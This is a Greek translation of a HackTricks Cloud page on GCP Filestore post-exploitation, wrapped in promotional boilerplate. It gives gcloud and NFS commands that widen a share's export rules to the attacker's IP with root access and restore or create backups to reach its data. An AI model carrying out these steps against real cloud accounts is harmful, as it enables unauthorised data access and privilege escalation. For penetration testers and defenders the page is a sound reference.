GCP - Filestore Post Exploitation

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
Αποκτήστε το επίσημο PEASS & HackTricks swag
Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.

Filestore

Για περισσότερες πληροφορίες σχετικά με το Filestore, ελέγξτε:

Τοποθέτηση του Filestore

Ένα κοινόχρηστο αρχείοσυστημα μπορεί να περιέχει ευαίσθητες πληροφορίες που ενδιαφέρουν από την άποψη ενός επιτιθέμενου. Με πρόσβαση στο Filestore είναι δυνατή η τοποθέτησή του:

sudo apt-get update
sudo apt-get install nfs-common
# Check the share name
showmount -e <IP>
# Mount the share
mkdir /mnt/fs
sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs

Για να βρείτε τη διεύθυνση IP ενός αρχείου αποθήκευσης, ελέγξτε την ενότητα απαρίθμησης της σελίδας:

GCP - Filestore Enum

Αφαιρέστε τους περιορισμούς και αποκτήστε επιπλέον δικαιώματα

Αν ο επιτιθέμενος δεν έχει πρόσβαση από μια διεύθυνση IP στον κοινόχρηστο χώρο, αλλά έχετε αρκετά δικαιώματα για να το τροποποιήσετε, είναι δυνατόν να αφαιρέσετε τους περιορισμούς ή να αποκτήσετε πρόσβαση σε αυτό. Είναι επίσης δυνατόν να χορηγήσετε περισσότερα προνόμια στη διεύθυνση IP σας για να έχετε διαχειριστική πρόσβαση στον κοινόχρηστο χώρο:

gcloud filestore instances update nfstest \
--zone=<exact-zone> \
--flags-file=nfs.json

# Contents of nfs.json
{
"--file-share":
{
"capacity": "1024",
"name": "<share-name>",
"nfs-export-options": [
{
"access-mode": "READ_WRITE",
"ip-ranges": [
"<your-ip-private-address>/32"
],
"squash-mode": "NO_ROOT_SQUASH",
"anon_uid": 1003,
"anon_gid": 1003
}
]
}
}

Αποκατάσταση ενός αντιγράφου ασφαλείας

Εάν υπάρχει ένα αντίγραφο ασφαλείας, είναι δυνατόν να το αποκαταστήσετε σε μια υπάρχουσα ή σε μια νέα περίπτωση, έτσι ώστε οι πληροφορίες να γίνουν προσβάσιμες:

# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
--zone=<zone> \
--tier=STANDARD \
--file-share=name=vol1,capacity=1TB \
--network=name=default,reserved-ip-range=10.0.0.0/29

# Restore a backups in a new instance
gcloud filestore instances restore <new-instance-name> \
--zone=<zone> \
--file-share=<instance-file-share-name> \
--source-backup=<backup-name> \
--source-backup-region=<backup-region>

# Follow the previous section commands to mount it

Δημιουργία αντιγράφου ασφαλείας και αποκατάστασή του

Εάν δεν έχετε πρόσβαση σε ένα κοινόχρηστο φάκελο και δεν θέλετε να τον τροποποιήσετε, είναι δυνατόν να δημιουργήσετε ένα αντίγραφο ασφαλείας του και να το αποκαταστήσετε όπως αναφέρθηκε προηγουμένως:

# Create share backup
gcloud filestore backups create <back-name> \
--region=<region> \
--instance=<instance-name> \
--instance-zone=<instance-zone> \
--file-share=<share-name>

# Follow the previous section commands to restore it and mount it

Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
Αποκτήστε το επίσημο PEASS & HackTricks swag
Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε τα κόλπα σας για το hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.

PreviousGCP - Compute Post Exploitation NextGCP - IAM Post Exploitation

Last updated 9 months ago